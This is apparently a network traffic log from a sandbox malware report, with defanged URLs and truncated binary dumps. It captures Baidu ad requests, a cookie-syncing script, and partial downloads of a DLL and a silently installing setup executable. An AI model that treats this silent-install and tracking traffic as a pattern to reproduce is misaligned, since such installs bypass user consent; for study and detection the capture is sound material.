User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISBID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISUS=1; CPROID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:26 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 1210
Connection: Keep-Alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat Jun 14 01:29:26 2014
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
HTTP/1.1 200 OK..Server: nginx..Date: Fri, 13 Jun 2014 17:29:26 GMT..C
ontent-Type: text/javascript;charset=UTF-8..Content-Length: 1210..Conn
ection: Keep-Alive..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Last-Modif
ied: Sat Jun 14 01:29:26 2014..Cache-Control: post-check=0, pre-check=
0..Pragma: no-cache..P3P: CP=" OTI DSP COR IVA OUR IND COM "..BAIDU_DU
P2_define('request!u1537506_0',[],{deps:['nova/painter/inlayFixed13920
89005'],data:{"id" : "u1537506","_isMlt" : 4,"sw" : 728,"sh" : 90,"_ht
ml" : {"cec":"utf-8", "dai":"3", "cfv":"11", "cpa":"1", "col":"en-us",
 "dis":"0", "xuanting":"0", "n":"67025059_1_cpr", "conOP":"0", "scale"
:"", "skin":"", "rsi0":"728", "rsi1":"90", "rsi5":"4", "ltr":"hXXp://w
ww.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html", "ltu":"hXXp://VVV.m
nh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0", "pcs":"758x45
0", "rss0":"#FFFFFF", "rss1":"#FFFFFF", "rss2":"#0000FF", "rss3":"#444
444", "rss4":"#008000", "rss5":"", "rss6":"#e10900", "rss7":"", "rad":
"", "pis":"10000x10000", "aurl":"", "psr":"1276x846", "pss":"758x493",
 "tpr":"1402680568181", "lunum":"6", "ch":"0", "at":"6", "qn":"0420a4e
a8165ad22", "ps":"357x3", "tn":"text_default_728_90", "ts":"1", "td_id
":"1537506", "adn":"3", "cad":"1", "ccd":"32"},"_html_old" : "cpro_cli
ent=67025059_1_cpr|cpro_template=text_default_728_90|cpro_h=90|cpro_w=
728|cpro_at=image|cpro_cbd=#FFFFFF|cpro_cbg=#FFFFFF|cpro_ctitle=#0000F
F|cpro_cdesc=#444444|cpro_curl=#008000|cpro_cflush=#e10900|cpro_161=3|
cpro_flush=4|cpro_cad=1","qn" : "0420a4ea8165ad22","_qid" : "0420a
<<< skipped >>>

GET /sync_pos.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1&t=1402680571713 HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=1&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4<r=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680568181&lunum=6&ch=0&at=6&qn=b4429549b809eb77&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537509&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537509
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISBID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISUS=49F93F86C60D03A8D23F3919153C48A7:FG=1; CPROID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:28 GMT
Content-Type: text/html
Content-Length: 1216
Last-Modified: Wed, 12 Mar 2014 07:45:00 GMT
Connection: Keep-Alive
ETag: "5320107c-4c0"
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Accept-Ranges: bytes
<!DOCTYPE html>.<html>.    .    <head></head>.
    .    <body>.        <script type="text/javascript">   
         .            var getCookie=function(b,d){var a;d=d||window;va
r c=RegExp("(^| )" b "=([^;]*)(;|$)").exec(d.document.cookie);c&&(a=c[
2]);return a},setCookie=function(b,d,a){a=a||{};var c=a.expires;"numbe
r"==typeof a.expires&&(c=new Date,c.setTime(c.getTime() a.expires));do
cument.cookie=b "=" d (a.path?"; path=" a.path:"") (c?"; expires=" c.t
oGMTString():"") (a.domain?"; domain=" a.domain:"") (a.secure?"; secur
e":"")},getUrlParam=function(b){b=RegExp("(^|&)" b "=([^&]*)(&|$)","i"
);b=window.location.search.substr(1).match(b);.            return null
!=b?decodeURIComponent(b[2]):null},currentDomain=document.domain.toLow
erCase(),referDomain=(document.referrer?document.referrer.match(/.*\:\
/\/([^\/]*).*/i)[1]:"").toLowerCase(),urlCproId=getUrlParam("CPROID"),
cookieCproId=getCookie("CPROID"),targetCproId;!urlCproId||"pos.baidu.c
om"!==currentDomain||"cpro.baidu.com"!==referDomain&&"cpro.baidustatic
.com"!==referDomain||cookieCproId&&cookieCproId===urlCproId||setCookie
("CPROID",urlCproId,{path:"/",domain:".pos.baidu.com",expires:(new Dat
e).setFullYear(2042)});.        </script>.    </body>..<
;/html>....
<<< skipped >>>

GET /ecom?cec=utf-8&dai=3&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=728&rsi1=90&rsi5=4&ltr=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&ltu=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680568181&lunum=6&ch=0&at=6&qn=0420a4ea8165ad22&ps=357x3&tn=text_default_728_90&ts=1&td_id=1537506&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537506 HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISBID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISUS=49F93F86C60D03A8D23F3919153C48A7:FG=1; CPROID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:29 GMT
Content-Type: text/html
Content-Length: 11189
Connection: Keep-Alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat Jun 14 01:29:29 2014
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<!-- 0|1; --&
gt;..<meta http-equiv="Content-Type" content="text/html; charset=UT
F-8" />..<meta http-equiv="X-UA-Compatible" content="IE=7" />
..<title>..............................</title>..<scrip
t language="javascript" src="hXXp://cpro.baidu.com/extra/text_flash/AC
_RunActiveContent.js"></script>..<style>..body{margin:0
;padding:0;}...uptown{position:relative;width:728px;height:90px;}...up
town #dish0{width:728px;height:90px;position:absolute;top:0;left:0;bac
kground-color:#fff;opacity:0;filter:alpha(opacity=0);}...uptown #dish1
{width:728px;height:90px;position:absolute;top:0;left:0;border:#FFFFFF
 solid 1px; }..a.logo{display:block;height:18px;width:26px;text-align:
justify;letter-spacing:20px;text-decoration:none;overflow:hidden;curso
r:default;position:absolute;bottom:0px;right:0px;z-index:10;}...cpro a
.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enable
d=true, src="hXXp://cpro.baidu.com/img/cpro_media_small.png", sizingMe
thod="image");background:url(hXXp://cpro.baidu.com/img/cpro_media_smal
l.png) no-repeat left top;*background:none;}...cpro a.logo:hover{width
:78px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enable
d=true, src="hXXp://cpro.baidu.com/img/cpro_media_large.png", sizingMe
thod="image");background:url(hXXp://cpro.baidu.com/img/cpro_media_
<<< skipped >>>


GET /media/v1/0f000AY4Gp2TGCsxgDBTq0.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0002EBaHfWMpy9Ew2v2s.swf?url_type=1&id_555316071=media/v1/0f000rmn6cn7D14hDeZLyf.gif&id_5553832
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:12 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 5301
Cache-Control: max-age=31536000
Expires: Fri, 13 Mar 2015 10:29:01 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
CWS.Y...x..8{x.U...d2.$..m.&!..i.6iyX.P.(.X...j..I...4.iZ.>6i.S.x..
...wS.ZyhPP..MSu......].....4..ru..gZ....~....I29.{....9m`[email protected]..
?K?....ZZ W...=.vGW%zZ4...vV.T.7n,.8....AUv.m........DQ....f<%..Ys.
...X.,...m.t..g....^4w.wR[,?.uv..S"[,*...au..Te.eHP............n.0.8..
....r.F..Z.jg..4...,..ee...j.......B..c..n....f.).M(K.....j=ck...tv..:
,..;-......).i*......S....sWg..b..p[=.i).St..Y.;....l.V[.%.VNa..M.`...
ru......|..L].`^.z..).F.......Y.j.......7n4Q8.7..8`..`.Z..?.....e`ce].
.j.7.~/B......a...o.t.....%x...M..y.K.G.o9[.B...x..~.q.Y..pgJ.H.......
Xh..d.'o$0.7.u....`.../C.}O.......*..q.P...J@%..*8.......3.........B..
.i...OS...0}.....D..K.........J...._#!..b...MH...=.:.u.....kT.7t......
[.E..d.........................&........n.6>X.....G..........5a....
H..z........Z26.....z.....^[email protected]../..M.......x..^...o.W..}....@L..
....=......V.9?.Ogm|A\..hs.....wz7W.....EQ-e*..?.X$_.....{eYm....{'..*
.0O..1.....T[...Y...i5.....z..T..`....u."......K.u."..e....%..=......u
......A..PA..........Ox....p.sx._.........W....W;..y..E{)]...pP$..].D.
Wh..<&..(.9.0%._;X....=.}..2I].........H.y.$X..".D.z.i..*<K.....
V&`Y.1:9"!....I.!...I..........W......z... ...9s..'.WV....2i...N... ..
........7....3R.z.g^.TR.}we.!.....R...$..J.u.B.......D^....Z..........
....$..rI.....J....E~%.;.M5.3....?H&......c...|..#.1.!<.!....9._..o
..j_.X.V.FO.J_.O......Uv8....'.......R3.*L.c.Y.k:.m.-..}.6.Z...:.f...=
..{...6..|KamJ.(...._..6f....IK..gPz.....C.....h.6.D`Y....CE;.......I.
..:[email protected]=....Hix. M...E'.=...;..Qbwhk.RW.*.|.
<<< skipped >>>


GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=1114112-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:28:50 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 93408
Content-Range: bytes 1114112-1207519/1207520
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT
Expires: Sat, 14 Jun 2014 07:20:40 GMT
x-bs-version: A65F70E089635AE47A1E2AED4F13B889
ETag: 30cbc602ada7cdfb0346038c05996d84
x-bs-request-id: MTAuMjE0LjQyLjIyOjgwODA6MTQ3NzYzMjU5MToxMS9KdW4vMjAxNCAxNToyMDo0MCA=
x-bs-meta-crc32: 2965621797
Content-MD5: 30cbc602ada7cdfb0346038c05996d84
x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
[email protected][email protected].........
..........................".......@...................................
........0................... [email protected].........................
.............."...................................".......(...........
......................................................................
..................................@...................................
................"...................................................".
......................................0.......8..."...................
....................`.......p.......h...".......@.....................
[email protected]...................................|..."...........
................................".....................................
..............".......................................0...".......4...
............................`...".......`.............................
..............".......................................................
....".......................................0...".....................
..................p...".......(.......................................
....................".......T...................................".....
..................................0.......8.......@..."...............
........................p.......x...........".........................
..........".......`...................................................
................"...$.................................................
..................................................................
<<< skipped >>>


GET /media/v1/0f000DYlKNGeiuam3jyYls.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0002EBaHfWMpy9Ew2v2s.swf?url_type=1&id_555316071=media/v1/0f000rmn6cn7D14hDeZLyf.gif&id_5553832
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:10 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 2520
Cache-Control: max-age=31536000
Expires: Fri, 13 Mar 2015 10:29:01 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
CWS.....x..V{T.U..w2......Bi....!/h-.(..XJ.Z....dBF.....|.m......Ju.j.
.........-nw.......(.h..lk[.....I....?...~...}...;.N.,.....@......;3..
........kM.C....*.....q8.....%....p...9.n..]......H'.#....I.:...|..G#V
.O3..X......^"....$..up!..E...ewa"?..D.0-V...!..%:G.8...}..F.8..c.r.&l
t;P.a....B%...}..T_.I..8..cA.J..T.....*kh.......1....l...mw&mR(....oeR
u...c...r.y"..S,yI........8..Ur...mI.%Q..-r.n..Y.r...vyJ...;.OR.;~....
\.JP.vBV.j.....U2\o..H.r5H.....m....j.\q7D.?.K_...l.j..p..@4".9...8...
^..............\#.k.f..../..k...ks....... .v.r.Yy.#....j........#c....
._...f.P.....e;<|.D..{l:f8.....8.e..'.....2...D....^c(w......n..r.m
...%..K.N..4..W..o.../..X.z{..1.i.M.....z..c...{..0g..q....g.k.....AF.
......]..-.Zs.._..=o.>..nz.a...}.u.....<........5 .T.......l....
........o..{..Dc...N..<..........Q.5..*..E|M..z).xz.h......Xh.@....
|..[.....'............;.Q.2..'N.;}H....8.m..K.ffz.U...2.?T..x.g.....'.
.........._..M.]2SQ48=.....].._}s.H...5..........d...t.h.'...g.H0O....
.*Z32\.q......~.......c.z..y..8.~.......x.M........qf..o.T.\..'.Y....5
....n........./....l.....=8.~V..........^.....UR..l.."8=f.......nr...z
e.........,...^o...~.dg."..j...{. ..T....E..?_......Z.|[email protected]
[email protected]|v......_sj./.=S..4.....x...........w?R.q.x.w.o.
w........:>.E...~...N...t.,?).V`.<[email protected].:(p.. ..A...6.
....Z....6y...5....E....n.x0...v:WZ...Q.?*$WG..:...|oP.Y.....9...%.o..
[email protected]...\..k.......C...._.E.j..h...m..bm.../E.(..^....:...O.~....
.1q0..N..m..k.{[email protected],..J/^G.o..S......`.%D.|.=..).
<<< skipped >>>


GET /client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Range: bytes=17039360-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 206 Partial Content
Expires: Sun, 13 Jul 2014 16:12:29 GMT
Date: Fri, 13 Jun 2014 16:12:29 GMT
Server: nginx
Content-Type: application/octet-stream
Last-Modified: Tue, 10 Jun 2014 19:14:19 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Content-Range: bytes 17039360-30927031/30927032
Content-Length: 13887672
Age: 4628
Via: 1.0 sdytwt86:80 (Cdn Cache Server V2.0), 1.0 tswt76:80 (Cdn Cache Server V2.0), 1.0 shiben10:10003 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe"
HTTP/1.0 206 Partial Content..Expires: Sun, 13 Jul 2014 16:12:29 GMT..
Date: Fri, 13 Jun 2014 16:12:29 GMT..Server: nginx..Content-Type: appl
ication/octet-stream..Last-Modified: Tue, 10 Jun 2014 19:14:19 GMT..Ca
che-Control: max-age=2592000..Accept-Ranges: bytes..Content-Range: byt
es 17039360-30927031/30927032..Content-Length: 13887672..Age: 4628..Vi
a: 1.0 sdytwt86:80 (Cdn Cache Server V2.0), 1.0 tswt76:80 (Cdn Cache S
erver V2.0), 1.0 shiben10:10003 (Cdn Cache Server V2.0)..Connection: c
lose..Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.647.
511_Sid_55555_Silent_Defense.exe".........&. .,>9..Z:......G*......
...RQ..............7..[k_../.....Y..L1J.....!i;.......{# t..6BE..GY.2.
pGA..C...-"B..A.....<S7...IRe}...<$.....{&.*..G.R.gxS.Q....\.lL.
.l.;.#<[email protected]_.>.I.7.31...e...=I
b8.w...,>...?....)...zb.Yi..E.....F].k.....%..... ..X......U..D.WeH
0NYi|.Vn[...Bm.......X$>..C7.....{iM!.O....S~[a....PC....xdA..n.j.1
k..=.T........`.v..\....m.=.k^..X~......SS..<./..*.s.=..X7..T%&&..x
;9'.:.&..9.{{...o.7....~...... X_.v.......HL.\S......{.W..<.Q.w.n3.
Q.io....y..}..!..K..`..K.y.....q.....~\....d..%7....V..'^z.....9....8m
...E..Y.k.....o.(c.%...=.J...C.8B.....i..s.v...1.......YG.>...g.aQ.
.......Z..m...o...`.D.!.*]...L.......SD....t..!..(......L......g....).
.._.n..R.k...F.!..`JA..........z..."...M...3.2......f..=.O....]..N....
.i`........Wht....]"}go.zh..Y..~.....}[email protected].&E..v....
......^...#..g.3.I.....!....k).jf......u...5.m....}P>r...Y....O
<<< skipped >>>


GET /img/cpro_media_small.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cpro.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:01 GMT
Content-Type: image/png
Content-Length: 645
Last-Modified: Wed, 07 May 2014 11:40:06 GMT
Connection: close
ETag: "536a1b96-285"
Expires: Sat, 14 Jun 2014 17:29:01 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
.PNG........IHDR.............E.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...'IDATx..U...P...ZiI....*m..n.$.^ H...p.....[..@........~..... ..
.h..g....e.I^.2....|...&....{.K\.O5.4...7....#f;..M......rB.\~.......q
<.w.l.a .h..t...5......1.l6..$1.v.....\..d2.f.....b..*..Q......".I.
2...^....(J.7#~.Q...'...,.^z......=..}.....|N8...P(.. ..N.XmFO6.P..d..
F#. ..p8|Q*.......9dF....T*.V.......Z._......0.X,..X.)ptL..4....~$.9..
U......GB..0l.N...Z-...b}&.9s...! .~..?..K.Z.U2.<m4................
..?.8.*.|>/..........f.@... 4..."yC......q......t.5@/..*._.<....
a.d...lF"a.G..p$..W>..#...n..B.M8...b @.f..E..>...[{&..z..O..t..
!z.....Zi...~.0..a.....r....IEND.B`...



GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:28:37 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 1207520
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT
Expires: Sat, 14 Jun 2014 07:20:40 GMT
x-bs-version: A65F70E089635AE47A1E2AED4F13B889
ETag: 30cbc602ada7cdfb0346038c05996d84
x-bs-request-id: MTAuMjE0LjQyLjIyOjgwODA6MTQ3NzYzMjU5MToxMS9KdW4vMjAxNCAxNToyMDo0MCA=
x-bs-meta-crc32: 2965621797
Content-MD5: 30cbc602ada7cdfb0346038c05996d84
x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......M......S...S
...S.Y.S...S.[.S...S.[.S...S...S...S.[.S!..S...S...S...S...S.[.Sd..S.[
.S...S.[.S...S...S...S.[.S...SRich...S........................PE..L...
.!.Q...........!.....P... ......u........`............................
...........................................j.......V..................
[email protected]..@............`
..t............................text....O.......P.................. ..`
.rdata..1....`.......`..............@[email protected][email protected]........
[email protected]...............................@[email protected]..............
[email protected]..................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Range: bytes=23199744-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 206 Partial Content
Expires: Sun, 13 Jul 2014 16:12:29 GMT
Date: Fri, 13 Jun 2014 16:12:29 GMT
Server: nginx
Content-Type: application/octet-stream
Last-Modified: Tue, 10 Jun 2014 19:14:19 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Content-Range: bytes 23199744-30927031/30927032
Content-Length: 7727288
Age: 4614
Via: 1.0 sdytwt86:80 (Cdn Cache Server V2.0), 1.0 tswt76:80 (Cdn Cache Server V2.0), 1.0 shiben10:10003 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe"
.....5L$..z....zl;..../b6...v......7.G_....N*..YW3l.QYWI.a......G.Y[l.
...x..BI.CI..mA..}...E..a.....-;...O.V.i.8.qKx...%.......#$.].H....=,.
9@.!.g.MZr..v..%.h/....%`.....7..<A..e....nP...o..w.N`...........D.
X...M.....".Z.HX....H\....3.X..q^-...................(...!...=].a...,N
"..cj...q.....Jq.sf.}a..O......f.3.c...W.$.....%d.K.......,..e<T.,.
..L....Q0[..LAq......39.qu.LX...-..k....1b....>.....{.A.J..>....
VP....6...p.=......2.8....a....9G...;....L....I.cu..0KuP%.c....Q...rtl
..o..q...B..RP.....G..NA..p..s......{.(...p.l..k,.f.?..lf..d.uO.....Kb
p..].0..m.*R..^.......k.n.|...rP...g~X.e.b.b.[..t......o..gI...dw]..n.
..."Q.4.....L..~........`'E...Y.uG.............`....Z..G....6i..T.....
#..].T.g.......t.~....!.v..n....6J..D..Q.f....~...&...={...!......{.tL
A..;[email protected]....&....&...T
[email protected]...!:?.xe....b..k.....9....i.~..........K...s^#..........
.w.........5..r-...`.f.-..,9.....,.......>v./0...}..?}.|..AA.....4.
......WA..x.#=.=....tx @....}J(.F.V].x>.6...S...Z..*...*~.z.A..}{.]
.*.....z...r........ ........8>)Z8f|n.'P...0...Y_...{....S...OD.P*.
..[.SA..{W./..S.t*......dEC<o...1 ............oYz.....A.u^.Z...>
5.*..k......H.4...H...X..T3o)..;.D..<d..e[G..Z*.>.(1..S.C.!]9.q.
.....c=.2.......|O.H.|...h.Xc..]..f...s.s$....-S....(......h......h.&l
t;p..N..>..O^j^M%`...0.C......(..:R..g.m..R.%..^.zs...a..(..T.V.!'n
..d.x......(...ZUc..6e8_.Ju.=..x;9...... ........5.}......._..o ....T.
... .5...A.......bG.k...Q.$....<.r.r..R.O... ..1...bV8...).\.1.
<<< skipped >>>


GET /client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Range: bytes=262144-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 206 Partial Content
Expires: Sun, 13 Jul 2014 16:12:29 GMT
Date: Fri, 13 Jun 2014 16:12:29 GMT
Server: nginx
Content-Type: application/octet-stream
Last-Modified: Tue, 10 Jun 2014 19:14:19 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Content-Range: bytes 262144-30927031/30927032
Content-Length: 30664888
Age: 4614
Via: 1.0 sdytwt86:80 (Cdn Cache Server V2.0), 1.0 tswt76:80 (Cdn Cache Server V2.0), 1.0 shiben10:10003 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe"
NNN.NNN.MMM.LLL.KKK.JJJ.III.HHH.GGG.FFF.EEE.CCC.CCC.CCC.CCC.CCC.CCC.CC
CqCCCZCCC>CCC'CCC..................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................................CCC.CCC
.CCC2CCCJCCC_CCCwCCC.CCC.CCC.CCC.CCC.CCC.DDD.EEE.FFF.GGG.HHH.III.JJJ.K
KK.LLL.MMM.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN
.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.N
NN.```.CCC.....................CCC.ccc.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN
.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.NNN.N
NN.NNN.NNN.NNN.MMM.LLL.KKK.JJJ.III.HHH.GGG.FFF.EEE.CCC.CCC.CCC.CCC.CCC
.CCC.CCCqCCCZCCC>CCC'CCC...........................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /go/full/1/70745 HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
